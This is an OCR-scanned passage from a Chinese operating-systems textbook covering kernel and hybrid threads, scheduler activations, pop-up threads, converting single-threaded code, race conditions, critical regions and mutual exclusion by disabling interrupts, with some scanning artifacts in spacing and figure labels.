运行 另 一 个 进程 中 的 线程 。 而 在 用 户 级 线程 中 ， 运 行 时 系统 始终 运行 自己 进程 中 的 线程 ， 直 到 内 核 剥 夺 
它 的 CPU (或 者 没有 可 运行 的 线程 存在 了 ) 为 止 。 

由 于 在 内 核 中 创建 或 撤销 线程 的 代价 比较 大 ， 某 些 系统 采取 “环保 ”的 处 理 方式 ， 回 收 其 线程 。 当 
某 个 线程 被 撤销 时 ， 就 把 它 标志 为 不 可 运行 的 ， 但 是 其 内 核 数据 结构 没有 受到 影响 。 稍 后 ， 在 必须 创建 
一 个 新 线程 时 ， 就 重新 启动 某 个 旧 线 程 ， 从 而 节省 了 一 些 开销 。 在 用 户 级 线程 中 线程 回收 也 是 可 能 的 ， 
但 是 由 于 其 线程 管理 的 代价 很 小 ， 所 以 没有 必要 进行 这 项 工作 。 

内 核 线程 不 需要 任何 新 的 、 非 阻塞 系统 调用 。 另 外 ， 如 果 某 个 进程 中 的 线程 引起 了 页 面 故障 ， 内 核 
可 以 很 方便 地 检查 该 进程 是 否 有 任何 其 他 可 运行 的 线程 ， 如 果 有 ， 在 等 待 所 需要 的 页 面 从 磁盘 读 人 时 ， 
就 选择 一 个 可 运行 的 线程 运行 。 这 样 做 的 主要 缺点 是 系统 调用 的 代价 比较 大 ， 所 以 如 果 线程 的 操作 ( 创 
建 、 终 止 等 ) 比较 多 ， 就 会 带 来 很 大 的 开销 。 

虽然 使 用 内 核 线程 可 以 解决 很 多 问题 ， 但 是 也 不 会 解决 所 有 的 问题 。 例 如 ， 当 一 个 多 线程 进程 创建 
新 的 进程 时 ， 会 发 生 什么 ?新 进程 是 拥有 与 原 进程 相同 数量 的 线程 ， 还 是 只 有 一 个 线程 在 很 多 情况 下 ， 
最 好 的 选择 取决 于 进程 计划 下 一 步 做 什么 。 如 果 它 要 调用 exec 来 启动 一 个 新 的 程序 ， 或 许 一 个 线程 是 正 
确 的 选择 ， 但 是 如 果 它 继续 执行 ， 则 最 好 复制 所 有 的 线程 。 

另 一 个 话题 是 信号 。 回 忆 一 下 ， 信 号 是 发 给 进程 而 不 是 线程 的 ， 至 少 在 经 典 模型 中 是 这 样 的 。 当 一 
个 信号 到 达 时 ， 应 该 由 哪 一 个 线程 处 理 它 》 线 程 可 以 “注册 ”它们 感 兴趣 的 某 些 信号 ， 因 此 当 一 个 信号 
到 达 的 时 候 ， 可 把 它 交 给 需要 它 的 线程 。 但 是 如 果 两 个 或 更 多 的 线程 注册 了 相同 的 信号 ， 会 发 生 什么 ? 
这 只 是 线程 引起 的 问题 中 的 两 个 ， 但 是 还 有 更 多 的 问题。 

2.2.6 混合 实现 

人 们 已 经 研究 了 各 种 试图 将 用 户 级 线程 的 优点 和 内 核 级 线程 的 优点 结合 起 来 的 方法 。 一 种 方法 是 使 
用 内 核 级 线程 ， 然 后 将 用 户 级 线程 与 某 些 或 者 全 部 内 核 线程 多 路 复 用 起 来 ， 如 图 2-17 所 示 。 如 果 采 用 这 
种 方法 ， 编 程 人 员 可 以 决定 有 多 少 个 内 核 级 线程 和 P 
多 少 个 用 户 级 线程 彼此 多 路 复 用 。 这 一 模型 带 来 最 


大 的 灵活 度 。 
采用 这 种 方法 ， 内 核 只 识别 内 核 级 线程 ， 并 
对 其 进行 调度 。 其 中 一 些 内 核 级 线程 会 被 多 个 用 
户 级 线程 多 路 复 用 。 如 同 在 没有 多 线程 能 力 操作 
系统 中 某 个 进程 中 的 用 户 级 线程 一 样 ， 可 以 创建 、 


撤销 和 调度 这 些 用 户 级 线程 。 在 这 种 模型 中 ， 每 ieee | 内 核 
个 内 核 级 线程 有 一 个 可 以 轮流 使 用 的 用 户 级 线程 空间 


集合 。 图 2-17 用 户 级 线程 与 内 核 线程 多 路 复 用 
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2.2.7 调度 程序 激活 机 制 

尽管 内 核 级 线程 在 一 些 关键 点 上 优 于 用 户 级 线程 ， 但 无 可 争议 的 是 内 核 级 线程 的 速度 惕 。 因 此 ， 研 
究 人 员 一 直 在 寻找 在 保持 其 优良 特性 的 前 提 下 改进 其 速度 的 方法 。 下 面 将 介绍 Anderson 等 人 (1992) 设 
计 的 一 种 方法 ， 称 为 调度 程序 激活 (scheduler activation) 机 制 。Edler 等 人 (1988) 以 及 Scott 等 人 
(1990) 就 相关 的 工作 进行 了 深入 讨论 。 

调度 程序 激活 工作 的 目标 是 模拟 内 核 线程 的 功能 ， 但 是 为 线程 包 提供 通常 在 用 户 空间 中 才能 实现 的 
更 好 的 性 能 和 更 大 的 灵活 性 。 特 别 地 ， 如 果 用 户 线程 从 事 某 种 系统 调用 时 是 安全 的 ， 那 就 不 应 该 进行 专 
门 的 非 阻塞 调用 或 者 进行 提前 检查 。 无 论 如 何 ， 如 果 线 程 阻塞 在 某 个 系统 调用 或 页 面 故障 上 ， 只 要 在 同 
一 个 进程 中 有 任何 就 绪 的 线程 ， 就 应 该 有 可 能 运行 其 他 的 线程 。 

由 于 避免 了 在 用 户 空间 和 内 核 空间 之 间 的 不 必要 转换 ， 从 而 提高 了 效率 。 例 如 ， 如 果 某 个 线程 由 于 
等 待 另 一 个 线程 的 工作 而 阻塞 ， 此 时 没有 理由 请 求 内核 ， 这样 就 减少 了 内 核 一 用 户 转换 的 开销 。 用 户 空 
间 的 运行 时 系统 可 以 阻塞 同步 的 线程 而 另外 调度 一 个 新 线程 。 

当 使 用 调度 程序 激活 机 制 时 ， 内 核 给 每 个 进程 安排 一 定数 量 的 虚拟 处 理 器 ， 并 且 让 (用 户 空间 ) 运 
行 时 系统 将 线程 分 配 到 处 理 器 上 。 这 一 机 制 也 可 以 用 在 多 处 理 器 中 ， 此 时 虚拟 处 理 器 可 能 成 为 真实 的 
CPU。 分 配给 一 个 进程 的 虚拟 处 理 器 的 初始 数量 是 一 个 ， 但 是 该 进程 可 以 申请 更 多 的 处 理 器 并 且 在 不 用 
时 退回 。 内 核 也 可 以 取 回 已 经 分 配 出 去 的 虚拟 处 理 器 ， 以 便 把 它们 分 给 需要 更 多 处 理 器 的 进程 。 

使 该 机 制 工作 的 基本 思路 是 ， 当 内 核 了 解 到 一 个 线程 被 阻塞 之 后 (例如 ， 由 于 执行 了 一 个 阻塞 系统 
调用 或 者 产生 了 一 个 页 面 故障 )， 内 核 通 知 该 进程 的 运行 时 系统 ， 并 且 在 堆栈 中 以 参数 形式 传递 有 问题 
的 线程 编号 和 所 发 生 事件 的 一 个 描述 。 内 核 通过 在 一 个 已 知 的 起 始 地 址 启动 运行 时 系统 ， 从 而 发 出 了 通 
知 ， 这 是 对 UNIX 中 信号 的 一 种 粗略 模拟 。 这 个 机 制 称 为 上 行 调 用 (upcall) 。 

一 旦 如 此 激活 ， 运 行 时 系统 就 重新 调度 其 线程 ， 这 个 过 程 通常 是 这 样 的 : 把 当前 线程 标记 为 阻塞 并 
从 就 绪 表 中 取出 另 一 个 线程 ， 设 置 其 寄存 器 ， 然 后 再 启动 之 。 稍 后 ， 当 内 核 知道 原来 的 线程 又 可 运行 时 
(例如 ， 原 先 试图 读 取 的 管道 中 有 了 数据 ， 或 者 已 经 从 磁盘 中 读 入 了 故障 的 页 面 )， 内 核 就 又 一 次 上 行 调 
用 运行 时 系统 ， 通 知 它 这 一 事件 。 此 时 该 运行 时 系统 按照 自己 的 判断 ， 或 者 立即 重启 动 被 阻塞 的 线程 ， 
或 者 把 它 放 人 就 绪 表 中 稍 后 运行 。 

在 某 个 用 户 线程 运行 的 同时 发 生 一 个 硬件 中 断 时 ， 被 中 断 的 CPU 切换 进 内 核 态 。 如 果 被 中 断 的 进程 
对 引起 该 中 断 的 事件 不 感 兴趣 ， 比 如 ， 是 另 一 个 进程 的 IO 完成 了 ， 那 么 在 中 断 处 理 程序 结束 之 后 ， 就 
把 被 中 断 的 线程 恢复 到 中 断 之 前 的 状态 。 不 过 ， 如 果 该 进程 对 中 断 感 兴趣 ， 比 如 ， 是 该 进程 中 的 某 个 线 
程 所 需要 的 页 面 到 达 了 ， 那 么 被 中 断 的 线程 就 不 再 启动 ， 代 之 为 挂 起 被 中 断 的 线程 。 而 运行 时 系统 则 启 
动 对 应 的 虚拟 CPU， 此 时 被 中 断 线程 的 状态 保存 在 堆栈 中 。 随 后 ， 运 行 时 系统 决定 在 该 CPU 上 调度 哪个 
线程 : 被 中 断 的 线程 、 新 就 绪 的 线程 还 是 某 个 第 三 种 选择 。 

调度 程序 激活 机 制 的 一 个 目标 是 作为 上 行 调用 的 信赖 基础 ， 这 是 一 种 违反 分 层次 系统 内 在 结构 的 概 
念 。 通 常 ，n 层 提供 n + 1 层 可 调用 的 特定 服务 ， 但 是 n 层 不 能 调用 n + 1 层 中 的 过 程 。 上 行 调用 并 不 遵守 
这 个 基本 原理 。 


2.2.8 弹出 式 线程 

在 分 布 式 系统 中 经 常 使 用 线程 。 一 个 有 意义 的 例子 是 如 何 处 理 到 来 的 消息 ， 例 如 服务 请 求 。 传 统 的 
方法 是 将 进程 或 线程 阻塞 在 一 个 receive 系 统 调用 上 ， 等 待 消 息 到 来 。 当 消息 到 达 时 ， 该 系统 调用 接收 
消息 ， 并 打开 消息 检查 其 内 容 ， 然 后 进行 处 理 。 

不 过 ， 也 可 能 有 另 一 种 完全 不 同 的 处 理 方式 ， 在 该 处 理 方式 中 ， 一 个 消息 的 到 达 导 致 系统 创建 一 个 
处 理 该 消息 的 线程 ， 这 种 线程 称 为 弹出 式 线程 ， 如 图 2-18 所 示 。 弹 出 式 线程 的 关键 好 处 是 ， 由 于 这 种 线 
程 相当 新 ， 没 有 历史 一 一 没有 必须 存储 的 寄存 器 、 堆 栈 诸如 此 类 的 内 容 ， 每 个 线程 从 全 新 开始 ， 每 一 个 
线程 彼此 之 间 都 完全 一 样 。 这 样 ， 就 有 可 能 快速 创建 这 类 线程 。 对 该 新 线程 指定 所 要 处 理 的 消息 。 使 用 
弹出 式 线程 的 结果 是 ， 消 息 到 达 与 处 理 开始 之 间 的 时 间 非 常 短 。 
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进程 弹出 式 线程 :为 控制 
i 到 达 的 消息 而 创建 





图 2-18 在 消息 到 达 时 创建 一 个 新 的 线程 : a) 消息 到 达 之 前 ; b) 消息 到 达 之 后 


在 使 用 弹出 式 线程 之 前 ， 需 要 提前 进行 计划 。 例 如 ， 哪 个 进程 中 的 线程 先 运行 ? 如 果 系 统 支持 在 内 
核 上 下 文中 运行 线程 ， 线 程 就 有 可 能 在 那里 运行 (这 是 图 2-18 中 没有 画 出 内 核 的 原因 )。 在 内 核 空间 中 
运行 弹出 式 线程 通常 比 在 用 户 空间 中 容易 且 快 捷 ， 而 且 内 核 空 间 中 的 弹出 式 线程 可 以 很 容易 访问 所 有 的 
表格 和 IO 设备 ， 这 些 也 许 在 中 断 处 理 时 有 用 。 而 另 一 方面 ， 出 错 的 内 核 线 程 会 比 出 错 的 用 户 线程 造成 
更 大 的 损害 。 例 如 ， 如 果 某 个 线程 运行 时 间 太 长 ， 又 没有 办 法 抢占 它 ， 就 可 能 造成 进来 的 信息 丢失 。 


2.2.9 使 单线 程 代码 多 线程 化 

许多 已 有 的 程序 是 为 单线 程 进程 编写 的 。 把 这 些 程序 改写 成 多 线程 需要 比 直接 写 多 线程 程序 更 高 的 
技巧 。 下 面 考 察 一 些 其 中 易 犯 的 错误 。 

先 考 察 代码 ， 一 个 线程 的 代码 就 像 进程 一 样 ， 通 常 包含 多 个 过 程 ， 会 有 局 部 变量 、 全 局 变量 和 过 程 
参数 。 局 部 变量 和 参数 不 会 引起 任何 问题 ， 但 是 有 一 个 问题 是 ， 对 线程 而 言 是 全 局 变量 ， 并 不 是 对 整个 
程序 也 是 全 局 的 。 有 许多 变量 之 所 以 是 全 局 的 ， 是 因为 线程 中 的 许多 过 程 都 使 用 它们 (如 同 它们 也 可 能 
使 用 任何 全 局 变量 一 样 )， 但 是 其 他 线程 在 逻辑 上 和 这 些 变 量 无 关 。 

作为 一 个 例子 ， 考 虑 由 UNIX 维 护 的 errno 变 量 。 当 进程 (或 线程 ) 进行 系统 调用 失败 时 ， 错 误 码 会 
放 入 errno。 在 图 2-19 中 ， 线 程 1 执行 系统 调用 access 以 确定 是 否 允 许 它 访问 某 个 特定 文件 。 操 作 系统 把 
返回 值 放 到 全 局 变量 errno 里 。 当 控制 权 返回 到 线程 1 之 后 ， 并 在 线程 1 读 取 errno 之 前 ， 调 度 程序 确认 线 
程 1 此 刻 已 用 完 CPU 时 间 ， 并 决定 切换 到 线程 2。 线 程 2 执行 一 个 open 调 用 ， 结 果 失 败 ， 导 致 重 写 errno， 
于 是 给 线程 1 的 返回 值 会 永远 丢失 。 随 后 在 线程 1 执行 时 ， 它 将 读 取 错误 的 返回 值 并 导致 错误 操作 。 

对 于 这 个 问题 有 各 种 解决 方案 。 一 种 解决 方案 是 全 面 禁止 全 局 变量 。 不 过 这 个 想法 不 一 定 合 适 ， 因 
为 它 同 许多 已 有 的 软件 冲突 。 另 一 种 解决 方案 是 为 每 个 线程 赋予 其 私有 的 全 局 变量 ， 如 图 2-20 所 示 。 在 
这 个 方案 中 ， 每 个 线程 有 自己 的 errno 以 及 其 他 全 局 变量 的 私有 副本 ， 这 样 就 避免 了 冲突 。 在 效果 上 ， 这 
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个 方案 创建 了 新 的 作用 域 情 ， 这 些 变 量 对 一 个 线程 中 所 有 过 程 都 是 可 见 的 。 而 在 原先 的 作用 域 层 里 ， 变 
量 只 对 一 个 过 程 可 见 ， 并 在 程序 中 处 处 可 见 。 

访问 私有 的 全 局 变量 需要 有 些 技 巧 , 不 过 ,多 数 程序 设计 语言 具有 表示 局 部 变量 和 全 局 变量 的 方式 ， 
而 设 有 中 间 的 形式 。 有 可 能 为 全 局 变量 分 配 一 块 内 存 ， 并 将 它 转送 给 线程 中 的 每 个 过 程 作为 额外 的 参数 。 
尽管 这 不 是 一 个 漂亮 的 方案 ,但 却 是 一 个 可 用 的 方案 。 

还 有 另 一 种 方案 ， 可 以 引入 新 的 库 过 程 ， 以 便 创建 、 设 置 和 读 取 这 些 线程 范围 的 全 局 变量 。 首 先 一 
个 调用 也 许 是 这 样 的 : 

create_global("bufptr ); 


该 调用 在 堆 上 或 在 专门 为 调用 线程 所 保留 的 特殊 存储 区 上 替 一 个 名 为 bufptr 的 指针 分 配 存 储 空间 。 无 论 
该 存储 空间 分 配 在 何 处 ， 只 有 调用 线程 才 可 访问 其 全 局 变量 。 如 果 另 一 个 线程 创建 了 同名 的 全 局 变量 ， 
由 于 它 在 不 同 的 存储 单元 上 ， 所 以 不 会 与 已 有 的 那个 变量 产生 冲突 。 
访问 全 局 变量 需要 两 个 调用 : 一 个 用 于 写 入 全 局 变量 ， 另 一 个 用 于 读 取 全 局 变量 。 对 于 写 入 ， 类 似 有 
set_global("bufptr", &buf); 


它 把 指针 的 值 保 存在 先前 通过 调用 create_global 创 建 的 存储 单元 中 。 如 果 要 读 出 一 个 全 局 变量 ， 调 用 的 
形式 类 似 于 
bufptr = read_global("bufptr"); 


这 个 调用 返回 一 个 存储 在 全 局 变量 中 的 地 址 ， 这 样 就 可 以 访问 其 中 的 数据 了 。 

试图 将 单一 线程 程序 转 为 多 线程 程序 的 另 一 个 问题 是 ， 有 许多 库 过 程 并 不 是 可 重 和 的。 也 就 是 说 ， 
它们 不 是 被 设计 成 下 列 工作 方式 的 ; 对 于 任何 给 定 的 过 程 ， 当 前 面 的 调用 尚 没有 结束 之 前 ， 可 以 进行 第 
二 次 调用 。 例 如 ， 可 以 将 通过 网 络 发 送 消 息 恰当 地 设计 为 ,在 库 内 部 的 一 个 固定 缓冲 区 中 进行 消息 组 合 ， 
然后 陷入 内 核 将 其 发 送 。 但 是 ， 如 果 一 个 线程 在 缓冲 区 中 编 好 了 消息 ， 然 后 被 时 钟 中 断 强迫 切换 到 第 二 
个 线程 ， 而 第 二 个 线程 立即 用 它 自己 的 消息 重 写 了 该 缓冲 区 ， 那 会 怎样 呢 ? 

类 似 的 还 有 内 存 分 配 过 程 ， 例 如 UNIX 中 的 malloc， 它 维护 着 内 存 使 用 情况 的 关键 表格 ， 如 可 用 内 
存 块 链表 。 在 malloc 忙 于 更 新 表格 时 ， 有 可 能 暂时 处 于 一 种 不 一 致 的 状态 ， 指 针 的 指向 不 定 。 如 果 在 表 
格 处 于 一 种 不 一 致 的 状态 时 发 生 了 线程 切换 ， 并 且 从 一 个 不 同 的 线程 中 来 了 一 个 新 的 调用 ， 就 可 能 会 由 
于 使 用 了 一 个 无 效 指针 从 而 导致 程序 崩溃 。 要 有 效 解决 这 些 问题 意味 着 重 写 整个 库 ， 而 这 有 可 能 引入 一 
些微 妙 的 错误 ， 所 以 这 么 做 是 一 件 很 复杂 的 事情 。 

另 一 种 解决 方案 是 ， 为 每 个 过 程 提供 一 个 包装 器 ， 该 包装 器 设置 一 个 二 进 制 位 从 而 标志 某 个 库 处 于 
使 用 中 。 在 先前 的 调用 还 没有 完成 之 前 ， 任 何 试图 使 用 该 库 的 其 他 线程 都 会 被 阻塞 。 尽管 这 个 方式 可 以 
工作 ， 但 是 它 会 极 大 地 降低 系统 潜在 的 并 行 性 。 

接着 考虑 信号 。 有 些 信号 逻辑 上 是 线程 专用 的 ,但 是 另 一 些 却 不 是 。 例 如 ， 如 果 某 个 线程 调用 
alarm， 信 号 送 往 进行 该 调用 的 线程 是 有 意义 的 。 但 是 ， 当 线程 完全 在 用 户 空间 实现 时 ， 内 核 根 本 不 知 
道 有 线程 存在 ， 因 此 很 难 将 信号 发 送 给 正确 的 线程 。 如 果 一 个 进程 一 次 仅 有 一 个 警报 信号 等 待 处 理 ， 而 
其 中 的 多 个 线程 又 独立 地 调用 alarm， 那 么 情况 就 更 加 复杂 了 。 

有 些 信 号 ， 如 键盘 中 断 ， 则 不 是 线程 专用 的 。 谁 应 该 捕捉 它们 ? 一 个 指定 的 线程 ? 所 有 的 线程 ? 还 
是 新 创建 的 弹出 式 线程 ? 进而 ， 如 果 某 个 线程 修改 了 信号 处 理 程序 ， 而 没有 通知 其 他 线程 ， 会 出 现 什么 
情况 ? 如 果 某 个 线程 想 捕捉 一 个 特定 的 信号 〈 比 如 ， 用 户 击 键 CTRL+C) ， 而 另 一 个 线程 却 想 用 这 个 信 
号 终止 进程 ， 又 会 发 生 什 么 情况 ? 如 果 有 一 个 或 多 个 线程 运行 标准 的 库 过 程 以 及 其 他 用 户 编写 的 过 程 ， 
那么 情况 还 会 更 复杂 。 很 显然 ， 这 些 想法 是 不 兼容 的 。 一 般 而 言 ， 在 单线 程 环境 中 信号 已 经 是 很 难 管理 
的 了 ， 到 了 多 线程 环境 中 并 不 会 使 这 一 情况 变 得 容易 处 理 。 

由 多 线程 引入 的 最 后 一 个 问题 是 堆栈 的 管理 。 在 很 多 系统 中 ， 当 一 个 进程 的 堆栈 溢出 时 ， 内 核 只 是 
自动 为 该 进程 提供 更 多 的 堆栈 。 当 一 个 进程 有 多 个 线程 时 ， 就 必须 有 多 个 堆栈 。 如 果 内 核 不 了 解 所 有 的 
堆栈 ， 就 不 能 使 它们 自动 增长 ， 直 到 造成 堆栈 出 错 。 事 实 上 ， 内 核 有 可 能 还 没有 意识 到 内 存 错误 是 和 某 
个 线程 栈 的 增长 有 关系 的 。 

这 些 问 题 当 然 不 是 不 可 克服 的 ， 但 是 却说 明了 给 已 有 的 系统 引入 线程 而 不 进行 实质 性 的 重新 设计 系 
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统 是 根本 不 行 的 。 至 少 可 能 需要 重新 定义 系统 调用 的 语义 ， 并 且 不 得 不 重 写 库 。 而 且 所 有 这 些 工作 必须 
与 在 一 个 进程 中 有 一 个 线程 的 原 有 程序 向 后 兼容 。 有 关 线程 的 其 他 信息 ， 可 以 参阅 Hauser 等 人 (1993) 
和 Marsh 等 人 (1991), 
2.3 进程 间 通 信 

进程 经 常 需要 与 其 他 进程 通信 。 例 如 ， 在 一 个 shell 管道 中 ， 第 一 个 进程 的 输出 必须 传送 给 第 二 个 进 
程 ， 这 样 沿 着 管道 传递 下 去 。 因 此 在 进程 之 间 需 要 通信 ， 而 且 最 好 使 用 一 种 结构 良好 的 方式 而 不 要 使 用 
中 断 。 在 下 面 几 节 中 ， 我 们 就 来 讨论 一 些 有 关 进 程 间 通 信 (Inter Process Communication, IPC) 的 问题 。 

简要 地 说 ， 有 三 个 问题 。 第 一 个 问题 与 上 面 的 叙述 有 关 ， 即 一 个 进程 如 何 把 信息 传递 给 另 一 个 。 第 
二 个 要 处 理 的 问题 是 ， 确 保 两 个 或 更 多 的 进程 在 关键 活动 中 不 会 出 现 交 又 ， 例 如， 在 飞机 订 票 系统 中 的 
两 个 进程 为 不 同 的 客户 试图 争夺 飞机 上 的 最 后 一 个 座位 。 第 三 个 问题 与 正确 的 顺序 有 关 (如 果 该 顺序 是 
有 关联 的 话 )， 比 如 ， 如 果 进 程 A 产 生 数 据 而 进程 B 打 印 数据 ， 那 么 B 在 打印 之 前 必须 等 待 ， 直 到 A 已 经 
产生 一 些 数据 。 我 们 将 从 下 一 节 开 始 考察 所 有 这 三 个 问题 。 

有 必要 说 明 ， 这 三 个 问题 中 的 两 个 问题 对 于 线程 来 说 是 同样 适用 的 。 第 一 个 问题 ( 即 传递 信息 ) 对 线 
程 而 言 比较 容易 ， 因 为 它们 共享 一 个 地 址 空间 (在 不 同 地 址 空间 需要 通信 的 线程 属于 不 同 进程 之 间 通 信 的 
情形 )。 但 是 另外 两 个 问题 (需要 梳理 清楚 并 保持 恰当 的 顺序 ) 同样 适用 于 线程 。 同 样 的 问题 可 用 同样 的 
方法 解决 。 下 面 开 始 讨论 进程 间 通 信 问 题 ， 不 过 请 记 住 ， 同 样 的 问题 和 解决 方法 也 适用 于 线程 。 
2.3.1 竞争 条 件 

在 一 些 操作 系统 中 ， 协 作 的 进程 可 能 共享 一 些 彼此 都 能 读 写 的 公用 存储 区 。 这 个 公用 存储 区 可 能 在 
内 存 中 (可 能 是 在 内 核 数据 结构 中 )， 也 可 能 是 一 个 共享 文件 。 这 里 共享 存储 区 的 位 置 并 不 影响 通信 的 
本 质 及 其 带 来 的 问题 。 为 了 理解 实际 中 进程 间 通 信和 如 何 工作 ， 我 们 考虑 一 个 简单 但 很 普遍 的 例子 : 一 个 
假 脱 机 打印 程序 。 当 一 个 进程 需要 打印 一 个 文件 时 ， 它 将 文件 名 放 在 一 个 特殊 的 假 脱 机 目录 (spooler 
directory) 下 。 另 一 个 进程 (打印 机 守护 进程 ) 则 周期 性 地 检查 是 否 有 文件 需要 打印 ， 若 有 就 打印 并 将 
该 文件 名 从 目录 下 删 掉 。 

设想 假 脱 机 目录 中 有 许多 槽 位 ， 编 号 依次 为 0，1， 
2，…， 每 个 槽 位 存放 一 个 文件 名 。 同 时 假设 有 两 个 共 


假 脱 机 目录 


享 变量 ， out， 指 向 下 一 个 要 打印 的 文件 ，in， 指 向 目录 
中 下 一 个 空闲 槽 位 。 可 以 把 这 两 个 变量 保存 在 一 个 所 有 RA 

进程 都 能 访问 的 文件 中 ， 该 文件 的 长 度 为 两 个 字 。 在 某 

一 时 刻 ，0 号 至 3 号 槽 位 空 (其 中 的 文件 已 经 打印 完毕 ) ， 





4 号 至 6 号 槽 位 被 占用 (其 中 存 有 排 好 队列 的 要 打印 的 文 ; 
件 名 ) 。 几 乎 在 同一 时 刻 ， 进 程 A 和 进程 B 都 决定 将 一 个 
文件 排队 打印 ， 这 种 情况 如 图 2-21 所 示 。 

在 Murphy 法 则 (任何 可 能 出 错 的 地 方 终 将 出 错 ) 图 2-21 两 个 进程 同时 想 访问 共享 内 存 
生效 时 ， 可 能 发 生 以 下 的 情况 。 进 程 A 读 到 in 的 值 为 7， 
将 7 存在 一 个 局 部 变量 next_free_slot 中 。 此 时 发 生 一 次 时 钟 中 断 ，CPU 认 为 进程 A 已 运行 了 足够 长 的 时 间 ， 
决定 切换 到 进程 B。 进 程 B 也 读 取 in， 同 样 得 到 值 为 ?， 于 是 将 7 存在 B 的 局 部 变量 next_free_slot 中 。 在 这 
一 时 刻 两 个 进程 都 认为 下 一 个 可 用 槽 位 是 7。 

进程 B 现 在 继续 运行 ， 它 将 其 文件 名 存在 槽 位 7 中 并 将 in 的 值 更 新 为 8。 然 后 它 离开 ， 继 续 执行 其 他 操作 。 

最 后 进程 A 接 着 从 上 次 中 断 的 地 方 再 次 运行 。 它 检查 变量 next_free_slot， 发 现 其 值 为 7， 于 是 将 打 
印 文件 名 存 人 7 号 槽 位 ， 这 样 就 把 进程 B 存 在 那里 的 文件 名 覆盖 掉 。 然 后 它 将 next_free_slot 加 1， 得 到 值 
为 8， 就 将 8 存 到 in 中 。 此 时 ， 假 脱 机 目录 内 部 是 一 致 的 ， 所 以 打印 机 守护 进程 发 现 不 了 任何 错误 ， 但 进 
程 B 却 永远 得 不 到 任何 打印 输出 。 类 似 这 样 的 情况 ， 即 两 个 或 多 个 进程 读 写 某 些 共 享 数 据 ， 而 最 后 的 结 
果 取 决 于 进程 运行 的 精确 时 序 ， 称 为 竞争 条 件 (race condition)。 调 试 包含 有 竞争 条 件 的 程序 是 一 件 很 
头痛 的 事 。 大 多 数 的 测试 运行 结果 都 很 好 ， 但 在 极 少数 情况 下 会 发 生 一 些 无 法 解释 的 奇怪 现象 。 不 幸 的 
是 ， 多 核 增长 带 来 的 并 行使 得 竞争 条 件 越 来 越 普遍 。 
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2.3.2 临界 区 

怎样 避免 竟 争 条 件 ? 实际 上 凡 涉 及 共享 内 存 、 共 享 文件 以 及 共享 任何 资源 的 情况 都 会 引发 与 前 面 类 
似 的 错误 ， 要 避免 这 种 错误 ， 关 键 是 要 找 出 某 种 途径 来 阻止 多 个 进程 同时 读 写 共 享 的 数据 。 换 言 之 ， 我 
们 需要 的 是 互 斥 (mutual exclusion) ， 即 以 某 种 手段 确保 当 一 个 进程 在 使 用 一 个 共享 变量 或 文件 时 ， 其 
他 进程 不 能 做 同样 的 操作 。 前 述 问题 的 症结 就 在 于 ， 在 进程 A 对 共享 变量 的 使 用 未 结束 之 前 进程 B 就 使 
用 它 。 为 实现 互 斥 而 选择 适当 的 原 语 是 任何 操作 系统 的 主要 设计 内 容 之 一 ， 也 是 后 面 几 节 中 要 详细 讨论 
的 主题 。 

避免 竟 争 条 件 的 问题 也 可 以 用 一 种 抽象 的 方式 进行 描述 。 一 个 进程 的 一 部 分 时 间 做 内 部 计算 或 另外 
一 些 不 会 引发 竞争 条 件 的 操作 。 在 某 些 时 候 进程 可 能 需要 访问 共享 内 存 或 共享 文件 ， 或 执行 另外 一 些 会 导 
致 竞争 的 操作 。 我 们 把 对 共享 内 存 进行 访问 的 程序 片段 称 作 临界 区 域 (critical region) 或 临界 区 ( critical 
section) 。 如 果 我 们 能 够 适当 地 安排 ， 使 得 两 个 进程 不 可 能 同时 处 于 临界 区 中 ， 就 能 够 避免 竞争 条 件 。 

尽管 这 样 的 要 求 避免 了 竞争 条 件 ， 但 它 还 不 能 保证 使 用 共享 数据 的 并 发 进程 能 够 正确 和 高 效 地 进行 
协作 。 对 于 一 个 好 的 解决 方案 ， 需 要 满足 以 下 4 个 条 件 : 

1) 任何 两 个 进程 不 能 同时 处 于 其 临界 区 。 

2) 不 应 对 CPU 的 速度 和 数量 做 任何 假设 。 

3) 临界 区 外 运行 的 进程 不 得 阻塞 其 他 进程 。 

4) 不 得 使 进程 无 限期 等 待 进入 临界 区 。 

从 抽象 的 角度 看 ， 人 们 所 希望 的 进程 行为 如 图 2-22 所 示 。 图 2-22 中 进程 A 在 Ti 时 刻 进 入 临界 区 。 稍 
后 ， 在 T; 时 刻 进程 B 试 图 进入 临界 区 ,但 是 失败 了 ， 因 为 另 一 个 进程 已 经 在 该 临界 区 内 ， 而 一 个 时 刻 只 
允许 一 个 进程 在 临界 区 内 。 随 后 ，B 被 暂时 挂 起 直到 T3 时 刻 A 离 开 临界 区 为 止 ， 从 而 允许 B 立 即 进入 。 最 
后 ，B 离 开 (在 时 刻 T4) ， 回 到 了 在 临界 区 中 没有 进程 的 原始 状态 。 
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图 2-22 使 用 临界 区 的 互 斥 


2.3.3 忙 等 待 的 互 斥 

本 节 将 讨论 几 种 实现 互 斥 的 方案 。 在 这 些 方案 中 ， 当 一 个 进程 在 临界 区 中 更 新 共享 内 存 时 ， 其 他 进 
程 将 不 会 进入 其 临界 区 ， 也 不 会 带 来 任何 麻烦 。 

1. 屏蔽 中 断 

在 单 处 理 器 系统 中 ， 最 简单 的 方法 是 使 每 个 进程 在 刚刚 进入 临界 区 后 立即 屏蔽 所 有 中 断 ， 并 在 就 要 
离开 之 前 再 打开 中 断 。 屏 项 中 断后 ， 时 钟 中 断 也 被 屏蔽 。CPU 只 有 发 生 时 钟 中 断 或 其 他 中 断 时 才 会 进行 
进程 切换 ， 这 样 ， 在 屏蔽 中 断 之 后 CPU 将 不 会 被 切换 到 其 他 进程 。 于 是 ， 一 旦 某 个 进程 屏蔽 中 断 之 后 ， 
它 就 可 以 检查 和 修改 共享 内 存 ， 而 不 必 担 心 其 他 进程 介入 。 

这 个 方案 并 不 好 ， 因 为 把 屏蔽 中 断 的 权力 交 给 用 户 进程 是 不 明智 的 。 设 想 一 下 ， 若 一 个 进程 屏蔽 中 
断后 不 再 打开 中 断 ， 其 结果 将 会 如 何 ? 整个 系统 可 能 会 因此 终止 。 而 且 ， 如 果 系 统 是 多 处 理 器 (有 两 个 
或 可 能 更 多 的 处 理 器 ) ， 则 屏蔽 中 断 仅 仅 对 执行 disable 指 令 的 那个 CPU 有 效 。 其 他 CPU 仍 将 继续 运行 ， 
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并 可 以 访问 共享 内 存 。 

另 一 方面 ， 对 内 核 来 说 ， 当 它 在 更 新 变量 或 列表 的 几 条 指令 期 间 将 中 断 屏 蔽 是 很 方便 的 。 当 就 绪 进 
